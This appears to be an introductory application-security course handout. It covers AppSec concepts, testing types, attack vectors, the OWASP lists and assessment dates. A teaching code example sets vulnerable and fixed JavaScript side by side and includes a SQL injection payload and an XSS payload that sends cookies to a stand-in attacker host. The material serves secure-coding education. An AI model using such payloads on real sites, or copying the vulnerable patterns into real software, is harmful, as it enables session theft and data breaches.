AppSec Intro

Application security (AppSec) protects software applications from threats throughout their lifecycle, preventing unauthorized access and data theft. It has evolved from traditional monolithic applications to modern cloud-based microservices, requiring various security measures such as threat modeling, secure coding, and vulnerability scanning. Ensuring robust application security is crucial for maintaining business continuity, customer trust, and regulatory compliance while mitigating risks of cyber attacks.

Application Security (AppSec) and Its Importance
Application security (AppSec) protects software applications from
threats throughout their lifecycle. It prevents unauthorized access,
data theft, and operational disruptions.
What is Application Security?

Definition
Processes, techniques, and tools that protect software applications from threats throughout their lifecycle.

Purpose
Prevents adversaries from exploiting vulnerabilities to gain unauthorized access or steal data.

Evolution
Has evolved from monolithic on-premise applications to cloud-
based microservices architecture.
Traditional vs. Modern Applications

Traditional Applications
- Monolithic architecture with all components combined into a single program.
- Installed on single machines, often on-premises or self-hosted.
- Updates require altering the entire system, with manual maintenance.

Modern Cloud Applications
- Microservice architecture with independent services for easier updates.
- Deployed in single-cloud or multi-cloud environments.
- Automatically adjust resources based on demand for flexibility and scalability.
- Continuously download updates and patches automatically.
How Application Security Works
1 Threat Modeling
Analyzing applications to identify potential vulnerabilities and develop
mitigating controls.

2 Secure Coding
Writing code that resists attack: validating untrusted input, encoding output for the
context it is used in, and handling errors without leaking internal details.

3 Vulnerability Scanning
Using automated tools to scan for vulnerabilities like unpatched software
and misconfigurations.

4 Access Control
Implementing authentication and authorization to ensure only authorized
users access applications.
More Security Controls

Encryption
Translating data into another form that only people with access to a secret key can read.

Firewalls
Creating barriers between external networks and applications to block unauthorized access.

Security Monitoring
Watching applications for suspicious activity and responding to incidents promptly.

Web Application Firewalls
Monitoring and filtering HTTP traffic to block common web attacks like SQL injection. A WAF is a compensating control in front of the application; it does not remove the underlying vulnerability from the code.
Why Application Security Matters
1. Business Continuity: maintains operations.
2. Customer Trust: builds loyalty.
3. Regulatory Compliance: avoids penalties.
4. Attack Prevention: reduces breach risk.
5. Data Protection: safeguards sensitive information.

Organizations rely on applications to handle sensitive data and run operations. Proper security reduces cyber attack risks and builds customer trust.
Application Security Testing Types
1 Static Application Security Testing (SAST)
Analyzes source code during development to identify vulnerabilities
before deployment.

2 Dynamic Application Security Testing (DAST)
Tests running applications from the outside, sending simulated attacks and
observing responses, without access to the source code.

3 Interactive Application Security Testing (IAST)
Instruments the running application to detect vulnerabilities in real time
while it is exercised, combining aspects of SAST and DAST.

4 Software Composition Analysis (SCA)
Inventories the third-party and open-source components an application depends
on and matches them against databases of known vulnerabilities.
More Testing Approaches
Runtime Application Self-Protection (RASP)
Monitors applications while running to protect against
behaviors that traditional security might miss.

API Testing
Verifies reliability, performance, and security of API endpoints
that enable information sharing.

Infrastructure as Code (IaC) Testing
Tests the code used to automate infrastructure deployment to catch
insecure settings and misconfigurations before they reach production.

Penetration Testing
Simulates cyber attacks to identify vulnerabilities and
security weaknesses that attackers could exploit.
Consequences of Inadequate Security

Data Breaches
Unauthorized access to sensitive customer or business data leading to exposure.

Financial Loss
Direct costs from breaches, regulatory fines, and lost business opportunities.

Reputational Damage
Loss of customer trust and brand value after security incidents become public.

Business Disruption
System downtime and operational interruptions affecting service delivery.
Common Cyber Attack Vectors
1. Phishing Attacks: fraudulent messages tricking recipients into revealing sensitive information.
2. Malware Attacks: malicious software designed to damage systems or steal data.
3. SQL Injection: inserting malicious SQL code into database queries.
4. Cross-Site Scripting: injecting malicious scripts into trusted websites.
5. DDoS Attacks: overwhelming systems with traffic to cause service disruption.
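SQL injection and cross-site scripting from the list above, as an added example that is not part of the slides: each shown as the vulnerable code beside the fix, in JavaScript since the course builds on Node.js. The query, the comment renderer, the tiny "would this execute?" check and the attacker inputs are all constructed for this example; the parameterized form uses PostgreSQL-style `$1` placeholders, and a real driver (not shown) would bind the values.

```javascript
// Added example, not from the slides. Query text, renderer and payloads are constructed.

// ---- SQL injection ---------------------------------------------------------
// VULNERABLE: concatenation lets the input change the structure of the query.
function buildLoginQueryUnsafe(username) {
  return `SELECT id, password_hash FROM users WHERE username = '${username}'`;
}

// FIXED: parameterized query. The SQL text is fixed at write time; the values
// travel separately and are bound by the driver, so they are never parsed as SQL.
function buildLoginQuerySafe(username) {
  return {
    text: 'SELECT id, password_hash FROM users WHERE username = $1',
    values: [username],
  };
}

// Classic payload: closes the string, adds an always-true condition, comments out the rest.
const SQLI_PAYLOAD = "admin' OR '1'='1' --";

// ---- Cross-site scripting --------------------------------------------------
// VULNERABLE: untrusted text interpolated straight into HTML.
function renderCommentUnsafe(author, body) {
  return `<li><b>${author}</b>: ${body}</li>`;
}

// FIXED: encode the five characters that can change HTML context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}
function renderCommentSafe(author, body) {
  return `<li><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</li>`;
}

// Stand-in for a browser: does the markup contain a script tag or a tag with
// an on* event handler attribute? Only real tags count, not escaped text.
function containsActiveContent(html) {
  return /<script\b|<[a-z][^>]*\son\w+\s*=/i.test(html);
}

const XSS_PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>';
```

The parameterized query does not make the payload disappear: `values[0]` still holds the attacker's string verbatim, which is exactly the point. The database receives it as data for `$1`, never as part of the statement. Likewise `escapeHtml` preserves the text of the comment; it only stops the browser from reading it as markup.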
More Common Attack Vectors
1. Malicious Insiders: employees or contractors abusing legitimate access.
2. Password Attacks: attempts to crack or steal authentication credentials.
3. Misconfiguration: security gaps from improper system setup.
4. Poor Encryption: weak or missing data protection.

These attack vectors represent common ways adversaries target applications. Organizations must implement controls to address
each type of threat.
The OWASP Top 10 and API Top 10

What Is It?
A standardized list of the most critical security risks to web applications, maintained by OWASP (the Open Worldwide Application Security Project, formerly the Open Web Application Security Project). The companion OWASP API Security Top 10 covers the risks specific to APIs.

Based On
Real-world data and feedback from security experts, making it a reliable guide for application security.

Benefits
Provides a common language for discussing risks and solutions, helping organizations communicate about security posture.
Cloud Application Security
1 Definition
Practices and technologies that protect applications, infrastructure,
and data in cloud environments.

2 Importance
Essential for organizations using third-party cloud providers like
Amazon, Google, or Microsoft.

3 Challenges
Third-party relationships can increase the attack surface by exposing
new vulnerabilities and risks.

4 Common Threats
Misconfigured environments, poor encryption, weak access controls,
and DDoS attacks.
Web Application Security

Definition
Protection of websites and online services against vulnerabilities, threats, and attacks.

Benefits
Web applications provide cross-platform compatibility and accessibility through any browser.

Challenges
Complex infrastructure makes web applications susceptible to vulnerabilities at each layer.

Common threats include SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), insecure direct object references (IDOR), and unvalidated redirects.
Mobile Application Security

Mobile application security protects apps on smartphones and devices. With widespread mobile use, these applications are critical to
business operations and handle significant user data.
Mobile Security Threats

Insecure API Connections
Inadequately integrated APIs that expose sensitive data or functionality.

Man-in-the-Middle Attacks
Attackers manipulate data exchanged between the application and the server.

Code Tampering
Attackers modify the source code of open-source libraries the app depends on to introduce vulnerabilities.

Reverse Engineering
Attackers analyze application code to understand and exploit its inner workings.
Implementing Effective AppSec
Assess Current Posture
Evaluate existing applications and identify security gaps through
comprehensive scanning.

Develop Security Strategy


Create a plan that addresses identified vulnerabilities and
establishes security standards.

Implement Controls
Deploy appropriate security measures based on risk
assessment and business needs.

Continuous Monitoring
Regularly scan for new vulnerabilities and maintain
vigilance against emerging threats.
Your AppSec Journey

Authentication, Authorization
Develop a secure web app with authentication and authorization using the Node.js stack.

OWASP Top 10 and OWASP API Security Top 10
Apply the OWASP Top 10 and API Security Top 10 to the web application.
Important Dates
- Part 1: Assignment Submission (20%) - Week 06
- Part 2: Assignment Presentation & Demonstrations (10%) - Week 07
- Part 3: Case Study Interim Submission (20%) - Week 12
- Part 4: Interim Presentation & Demonstrations (10%) - Week 13
- Part 5: Case Study Final Submission (20%) - Week 16
- Part 6: Final Presentation & Demonstrations (20%) - Week 17
